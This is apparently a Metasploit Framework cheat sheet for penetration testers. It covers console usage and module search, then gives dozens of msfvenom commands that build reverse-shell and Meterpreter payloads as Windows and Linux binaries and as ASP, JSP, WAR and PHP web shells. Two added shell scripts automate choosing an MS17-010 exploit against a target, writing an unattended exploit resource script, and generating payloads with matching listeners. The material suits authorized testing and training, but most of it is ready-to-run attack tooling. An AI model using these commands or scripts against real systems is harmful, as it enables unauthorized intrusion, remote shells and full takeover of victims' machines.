====== Metasploit Framework ======

===== Description & Concepts =====

==== Free ====

**Metasploit Framework** is the free, open-source version of Metasploit, an exploitation framework.
  * Metasploit supports all phases of a penetration testing engagement, from information gathering to post-exploitation.

==== Concepts ====

There are three general concepts within the Metasploit Framework:
  - **Vulnerability:** A design, coding, or logic flaw affecting the target system.
  - **Exploit:** A piece of code that uses a vulnerability present on the target system.
  - **Payload:** The code that will run on the target system (delivered by the exploit).

==== The Console ====

  * ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'' on older installs).
  * Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.): anything that is not a console command is passed through to the underlying shell.

==== 4 Main Activities ====

There are 4 main activities you will almost always do when using Metasploit:
  - Start the console: command line ''msfconsole''
    * Review available commands at the ''msf'' prompt with: ''?''.
  - Select an exploit: this is what gets you into the target...
    * See a full list: ''show exploits''
    * Search: ''search [keyword]:[arg] [keyword]:[arg]''
  - Select a payload: this is what you want to run once you're in...
    * See a full list: ''show payloads''
  - Run the exploit:
    * Set any necessary options first (e.g., ''RHOSTS'')
    * ''run'' your exploit

==== Help ====

  * ''help [command name]'' - Shows the help text for the command indicated.
  * ''history'' - See a list of commands you used (so you can then do a ''help [command]'' on the command you need help with).

----

===== Modules & Usage =====

==== Search for Module ====

''search [parameters/keyword]'' - Search the Metasploit Framework database for modules relevant to the given search parameter/keyword.
  * You can search using CVE or Microsoft bulletin numbers, exploit names (eternalblue, heartbleed, etc.), or target system type.
  * Example, identifier: ''search ms17-010'' (a Microsoft bulletin ID; the same flaw matches on its CVE with ''search cve:2017-0144'')
  * Example, type: ''search type:auxiliary telnet''

**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.

''info'' - Show more information on the loaded module. You can see info on any module at any time with ''info'' followed by the full path of the module you need info on.

**Parameters (Keywords):**
^ Keyword ^ Description ^
| app | client or server attack |
| author | search by module author |
| bid | search by Bugtraq ID |
| cve | search by CVE ID |
| edb | search by Exploit-DB ID |
| name | search by descriptive name |
| platform | search by platform (Windows, Linux, etc.) |
| rank | search by rank, by name (''rank:good'') or numerically with a comparison (''rank:gte400'') |
| ref | modules with a specific reference |
| type | search by type (exploit, auxiliary, post, payload, encoder, evasion, nop) |

==== Search Result Ranking ====

You want a **Normal** ranking or above. Commands to filter modules by ranking:
<code>
# search only for exploits ranked great (the rank keyword takes a name or a numeric comparison such as gte500):
search type:exploit rank:great
# refuse to run anything below that rank, globally:
setg MinimumRank great
</code>

^ Rank ^ Value ^ Description [[https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html | source]] ^
| Excellent | 600 | The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()). |
| Great | 500 | The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. |
| Good | 400 | The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target. |
| Normal | 300 | The exploit is otherwise reliable, but depends on a specific version that is not the "common case" for this type of software and can't (or doesn't) reliably autodetect. |
| Average | 200 | The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms. |
| Low | 100 | The exploit is nearly impossible to exploit (under 50% success rate) for common platforms. |
| Manual | 0 | The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval). |

==== Select Module to Use ====

''use'' - Select a module to use. Follow ''use'' with the full path to the module you want to use or its number in your last search result list.

Example:
<code>
use exploit/windows/smb/ms17_010_eternalblue
# Results in a new, descriptive msf prompt
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
</code>

''back'' - Back out of (de-select, un-use) the module you just selected with ''use''.

==== Set Options ====

''show options'' or just ''options'' - Shows you the options of the loaded module that you can set.

''show advanced'' or just ''advanced'' - Shows you the advanced options of the loaded module that you can set.

''set [option name] [value]'' - Set the module options you need to set.

''unset [option name or all]'' - Unset a specific module option or all of them.

''setg [option name] [value]'' - Set an option globally so it is used by default in whatever module you load next (handy for ''LHOST'').

''unsetg [option name]'' - Unset a global option.

==== Run Module ====

''check'' - Where the module implements it, test whether the target is vulnerable without actually exploiting it (the ''Check'' column in search results says which modules support this).

''exploit'' or ''run'' - Launch the module.
  * Side note: ''run'' is an alias for ''exploit'', because "exploit" did not make sense for modules that are not exploits (port scanners, vulnerability scanners, etc.).
  * ''exploit -z'' (a nod to the ''Ctrl-z'' session key-binding) will put your newly created session into the background automatically. ''exploit -j'' runs the module itself as a background job, which is what you want for listeners.
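The select/set/run steps above, as an added example (this is not code from the original page or from the Metasploit project): a POSIX shell script that filters a constructed ''search ms17-010'' listing by minimum rank, using the framework's numeric rank scale, picks the first exploit that qualifies and writes the resource script for the use/set/check/exploit -z steps. The sample listing, the target 10.0.0.5, the attacker 10.0.0.2 and the payload choice are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original page or of Metasploit.
# 1) filter a `search` listing by minimum rank (Metasploit's own rank values),
# 2) emit a resource script that does use / set / check / exploit -z without typing.
set -eu

# Constructed sample of what `search ms17-010` prints in msfconsole (column layout as in msf6).
SAMPLE_SEARCH='Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution'

# Read search output on stdin; print "name rank" for rows whose rank is >= $1 (a rank word).
# Rank words map to the framework's numeric rankings (ExcellentRanking=600 ... ManualRanking=0),
# the same scale that `search rank:gte400` and `setg MinimumRank` work on.
filter_by_rank() {
  awk -v minname="$1" '
    BEGIN {
      v["excellent"]=600; v["great"]=500; v["good"]=400; v["normal"]=300
      v["average"]=200;   v["low"]=100;   v["manual"]=0
      if (!(minname in v)) { print "unknown rank: " minname > "/dev/stderr"; exit 2 }
      min = v[minname]
    }
    $1 ~ /^[0-9]+$/ {                       # numbered result rows only
      for (i = 3; i <= NF; i++)             # the date column may be empty, so locate the rank word
        if ($i in v) { if (v[$i] >= min) print $2, $i; break }
    }'
}

# First exploit/* module that meets the rank threshold (stdin = search output).
pick_exploit() {
  filter_by_rank "$1" | awk '$1 ~ /^exploit\// && !found { print $1; found = 1 }'
}

# Resource script for the select/set/run steps: $1 module, $2 RHOSTS, $3 LHOST, $4 payload.
# Run it with: msfconsole -q -r <file>
make_rc() {
  cat <<EOF
setg MinimumRank normal
use $1
set RHOSTS $2
set LHOST $3
set PAYLOAD $4
check
exploit -z
sessions -l
EOF
}

# Demo: the target and attacker addresses are assumptions.
main() {
  module=$(printf '%s\n' "$SAMPLE_SEARCH" | pick_exploit normal)
  if [ -z "$module" ]; then echo "no exploit at or above the requested rank" >&2; exit 1; fi
  make_rc "$module" 10.0.0.5 10.0.0.2 windows/x64/meterpreter/reverse_tcp
}
main "$@"
```

With the sample listing the script skips ''ms17_010_eternalblue'' (rank average, below Normal) and writes the resource script for ''ms17_010_psexec''; redirect ''main'' to a file and feed it to ''msfconsole -r'' to run the whole sequence unattended. Because ''setg MinimumRank normal'' is the first line, the console itself will also refuse any module below that rank, so the filter and the console agree.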
**Sessions:** Once a vulnerability has been successfully exploited (with ''exploit'' or ''run'') a session will be created. A session is the communication channel established between the target system and Metasploit.
  * ''background'' or ''Ctrl-z'' - at your session prompt (e.g. ''meterpreter >''), this command will send the session to the background (out of your way, so you will not be interacting with it).
  * ''sessions'' - lists your current sessions
  * ''sessions -i [Id number]'' - pull a session from the background to the foreground to interact with it.

----

===== Modules & Categories =====

==== [1] Auxiliary ====

Any supporting module, such as scanners, crawlers and fuzzers. Found here: ''/usr/share/metasploit-framework/modules/auxiliary''

==== [2] Encoders ====

Encode the payload, originally to strip bytes the exploit cannot deliver (null bytes and other "bad characters"); as a side effect the encoded bytes differ from the raw payload, which a purely signature-based antivirus solution may miss.
  * Encoders have a limited success rate against antivirus, because the decoder stub is itself signatured and modern products perform additional checks (emulation, behavioural analysis) on the decoded code.
  * Found here: ''/usr/share/metasploit-framework/modules/encoders''

==== [3] Evasion ====

Direct attempts to evade antivirus software.
  * Encoders only encode the payload and thus change its signature.
  * Evasion modules are an actual, direct attempt to evade antivirus software (e.g. generating a loader that hides the payload from static scanning).
  * Found here: ''/usr/share/metasploit-framework/modules/evasion''

==== [4] Exploits ====

Modules that... well... exploit. Very neatly organized by target platform here: ''/usr/share/metasploit-framework/modules/exploits''

==== [5] NOPs ====

NOPs (No OPeration) do nothing, literally.
  * They are used as a NOP sled in front of shellcode and as padding to achieve consistent payload sizes.
  * Found here: ''/usr/share/metasploit-framework/modules/nops''

==== [6] Payloads ====

Payloads are the code that will run on the target system.
  * Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
  * Examples: get a shell, load malware, load a backdoor, run a command, etc.
  * Found here: ''/usr/share/metasploit-framework/modules/payloads''

Payloads are split into three categories:
  - **Singles:** Self-contained payloads that do not need to download any additional component to run.
  - **Stagers:** Set up a connection channel between Metasploit and the target system.
    * Used by staged payloads.
    * //Staged payloads// first run a small stager on the target system, which then downloads the rest of the payload (in stages) from the handler.
    * This has an advantage when the exploit only gives you a little space: the stager is small compared to the full payload.
  - **Stages:** Downloaded by the stager. This allows you to use larger payloads (such as Meterpreter) than the exploit's buffer could hold at once.

Inline (single) vs. Staged Payloads:
  * An inline (single) payload has a name in which an underscore (''_'') joins the stage and the stager.
    * Example: ''generic/shell_reverse_tcp''
  * A staged payload puts the stage in its own path component before the stager (the slash in the name reflects the separation of the payload into stages).
    * Example: ''windows/x64/shell/reverse_tcp'' (stage ''shell'', stager ''reverse_tcp'')
  * The distinction matters in practice: the handler's ''PAYLOAD'' must be the same name (staged or stageless) that msfvenom was given, otherwise the listener either sends a stage the binary will never read or waits for a stager that never asks for one.

==== [7] Post ====

Post modules are useful during the final, post-exploitation phase. Found here: ''/usr/share/metasploit-framework/modules/post''

----

===== Syntax (Examples) =====

==== Two Common Commands ====

After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try:
<code>
# attempt privilege escalation to NT AUTHORITY\SYSTEM (Windows Meterpreter; normally needs an administrative session)
getsystem
# drop into a native OS shell on the target, in the current working directory of the session
shell
</code>

==== msfvenom ====

See [[cheat_sheets_various#msfvenom | here]].
==== MSF Handler ====

Start the listener in ''msfconsole'' before the payload runs on the target. Handlers should be in the following format, with the same ''PAYLOAD'', ''LHOST'' and ''LPORT'' values that were given to msfvenom:
<code>
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
exploit -j
</code>

==== Non-Meterpreter Binaries ====

**Staged Payloads for Windows**
<code>
# x86
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
</code>

**Stageless Payloads for Windows**
<code>
# x86
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
</code>

**Staged Payloads for Linux**
<code>
# x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
</code>

**Stageless Payloads for Linux**
<code>
# x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
</code>

==== Non-Meterpreter Web Payloads ====
<code>
# asp
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp
# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
# php
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php
</code>

==== Meterpreter Binaries ====

**Staged Payloads for Windows**
<code>
# x86
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
</code>

**Stageless Payloads for Windows**
<code>
# x86
msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
</code>

**Staged Payloads for Linux**
<code>
# x86
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
</code>

**Stageless Payloads for Linux**
<code>
# x86
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
</code>

==== Meterpreter Web Payloads ====
<code>
# asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
# jsp (java/jsp_shell_reverse_tcp is a plain shell, not Meterpreter; the handler's PAYLOAD must be the same name)
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
# war (Java Meterpreter packaged for a servlet container such as Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT= -f war > shell.war
# php
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
</code>
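The payload naming rule (single vs. staged) and the handler format above, as an added example that is not code from the page or from Metasploit/msfvenom: a POSIX shell script that classifies a payload name by that rule, derives the msfvenom ''-f'' value from the payload's platform, and generates the msfvenom command and the matching ''multi/handler'' resource script from one set of values, plus a check for a command/handler pair that was not generated together. The attacker address 10.0.0.2:4444 and the output file names are assumptions; the stage-name list in ''payload_kind'' is a heuristic, not an official list.

```shell
#!/bin/sh
# Added example, not part of the original page or of Metasploit/msfvenom.
# Shows the single-vs-staged naming rule and keeps msfvenom and multi/handler in step.
set -eu

# Staged payload names carry the stage as its own path component before the stager
# (windows/x64/shell/reverse_tcp); singles join the two with "_" (windows/x64/shell_reverse_tcp).
# Heuristic (assumption): the second-to-last component is a known stage name => staged.
payload_kind() {
  stage=$(basename "$(dirname "$1")")
  case "$stage" in
    meterpreter|shell|vncinject|dllinject|upexec) echo staged ;;
    *) echo single ;;
  esac
}

# msfvenom -f value for an artefact type (bin|asp|jsp|war|php); binaries depend on the
# payload's platform, which is the first component of its name.
venom_format() {
  case "$2" in
    bin)
      case "${1%%/*}" in
        windows) echo exe ;;
        linux)   echo elf ;;
        *) echo "no binary format for platform '${1%%/*}'" >&2; return 1 ;;
      esac ;;
    asp|war) echo "$2" ;;
    jsp|php) echo raw ;;
    *) echo "unknown artefact type '$2'" >&2; return 1 ;;
  esac
}

# The msfvenom command line: $1 payload, $2 LHOST, $3 LPORT, $4 artefact type, $5 output file.
venom_cmd() {
  fmt=$(venom_format "$1" "$4")
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$fmt" "$5"
}

# The matching handler, in the format the page gives, built from the SAME tuple ($1 payload,
# $2 LHOST, $3 LPORT). ExitOnSession=false keeps the listener up for further callbacks;
# -j -z runs it as a background job and backgrounds each new session.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Sanity check for a pair you did NOT generate together ($1 msfvenom command, $2 handler rc text):
# PAYLOAD and LPORT must match, or the stager and the handler will not speak the same protocol.
check_match() {
  cp=$(printf '%s\n' "$1" | sed -n 's/.* -p \([^ ]*\).*/\1/p')
  cl=$(printf '%s\n' "$1" | sed -n 's/.*LPORT=\([0-9]*\).*/\1/p')
  hp=$(printf '%s\n' "$2" | awk '$1=="set" && $2=="PAYLOAD" {print $3}')
  hl=$(printf '%s\n' "$2" | awk '$1=="set" && $2=="LPORT" {print $3}')
  [ -n "$cp" ] && [ "$cp" = "$hp" ] && [ "$cl" = "$hl" ]
}

# Demo with the page's payload names and an assumed listener of 10.0.0.2:4444.
main() {
  for p in windows/x64/shell/reverse_tcp windows/x64/shell_reverse_tcp \
           linux/x64/meterpreter/reverse_tcp php/meterpreter_reverse_tcp java/jsp_shell_reverse_tcp; do
    printf '%-36s %s\n' "$p" "$(payload_kind "$p")"
  done
  cmd=$(venom_cmd windows/x64/meterpreter_reverse_tcp 10.0.0.2 4444 bin shell-x64.exe)
  rc=$(handler_rc windows/x64/meterpreter_reverse_tcp 10.0.0.2 4444)
  printf '%s\n\n%s\n' "$cmd" "$rc"
  if check_match "$cmd" "$rc"; then echo "handler matches the binary"; else echo "MISMATCH" >&2; exit 1; fi
}
main "$@"
```

Save the ''handler_rc'' output to a file and start it with ''msfconsole -q -r handler.rc'' before the generated binary runs on the target. ''check_match'' is the part worth keeping around: pasting a stageless ''-p windows/x64/meterpreter_reverse_tcp'' next to a handler configured for the staged ''windows/x64/meterpreter/reverse_tcp'' is the classic "the payload ran but no session came back" mistake, and the check reports it before you burn the attempt.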